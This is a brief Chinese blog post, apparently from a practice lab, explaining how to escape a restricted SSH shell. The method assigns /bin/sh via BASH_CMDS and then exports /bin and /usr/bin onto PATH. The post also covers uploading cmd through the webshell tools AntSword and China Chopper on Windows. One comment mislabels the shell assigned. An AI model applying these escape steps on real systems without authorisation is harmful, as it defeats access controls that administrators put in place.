zoukankan
html css js c++ java
小记如何绕过受限的shell
今天的靶场登陆ssh后发现shell受限,如下
woami都执行不了,查看对应的bin目录,发现只能执行4个命令
在网上学到一招可以绕过这种受限制的被阉割的shell
BASH_CMDS[a]=/bin/sh;a #把/bin/bash给a变量
/bin/bash
echo $0 #查看脚本本身的名字
echo $? #命令执行结果反馈,0代表执行成功,其余数字表示不成功
export PATH=$PATH:/bin/ #将/bin 作为PATH环境变量导出
export PATH=$PATH:/usr/bin #将/usr/bin作为PATH环境变量导出
执行完上面加粗的四步之后就可以执行所有命令了
Windows中如果遇到此类情形
1.找到一处可上传文件的位置上传cmd
2.蚁剑可以自定义cmd的环境变量
使用菜刀同样上传cmd文件
设置cmd环境变量 终端输入 set cmd文件的物理地址
查看全文
相关阅读:
服务器(Ubuntu 12.04 LTS)上编译基于OpenCV的项目遇到的问题及解决方案
ubuntu 16.04 LTS 降级安装gcc 4.8
C#程序中获取电脑硬件配置信息的一种方法
C#程序将对象保存为json文件的方法
C#中运用事件实现异步调用
Redis实现分布式锁 php
CI框架整合UEditor编辑器上传功能
PHP给图片加水印具体实现
检测网站是否被和谐!
vue的双向绑定和依赖收集
原文地址:https://www.cnblogs.com/sup3rman/p/12392161.html
最新文章
zookeeper
kafka
docker命令
docker安装zookeeper
docker安装elasticsearch
springboot与redis
使用docker安装redis
Kafka学习笔记
微服务拆分思路
Effective MySQL之SQL语句最优化——读书笔记之二
热门文章
Effective MySQL之SQL语句最优化——读书笔记之一
Jmeter函数助手中添加自定义函数
Eclipse Mars 2安装Drools6.4插件(Drools and jBPM tools)时无法安装JBoss Runtime Drools Detector
两个docker容器互连时,提示no route to host错误的问题
docker在centos7下的一些坑
Jmeter遇到线程链接被重置(Connection reset by peer: socket write error)的解决方法
const关键字
a, b交换与比较问题
printf的执行顺序
Ubuntu下Python使用MySQLdb远程连接数据库的常见问题及解决方案
Copyright © 2011-2022 走看看